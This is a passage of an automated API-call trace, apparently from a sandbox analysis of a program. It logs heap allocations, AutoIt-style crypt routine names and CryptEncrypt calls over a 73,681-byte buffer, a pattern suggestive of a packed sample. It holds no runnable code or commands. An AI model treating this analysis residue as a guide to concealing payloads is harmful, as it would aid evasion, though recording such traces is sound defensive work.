pbData=0x43e25a0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e25a0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0077.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0077.059] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0077.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0077.061] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.061] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0077.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0077.064] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0077.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0077.064] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0077.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0077.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0077.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0077.064] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0077.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0077.065] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0077.065] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.065] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0077.065] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0077.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0077.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11fc2) returned 0x4925fb8 [0077.067] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0077.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43ca7f0 [0077.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca7f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.068] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x11fc2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x11fd0) returned 1 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0077.068] CharLowerBuffW (in: lpsz="byte[73681]", cchLength=0xb | out: lpsz="byte[73681]") returned 0xb [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0077.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0077.069] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.069] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0077.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0077.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0077.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0077.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cab80 [0077.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.069] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4925fb8*, pdwDataLen=0x144e790*=0x11fc2, dwBufLen=0x11fd0 | out: pbData=0x4925fb8*, pdwDataLen=0x144e790*=0x11fd0) returned 1 [0077.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0077.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0077.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0077.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0077.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0077.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0077.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0077.070] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.070] CharUpperBuffW (in: 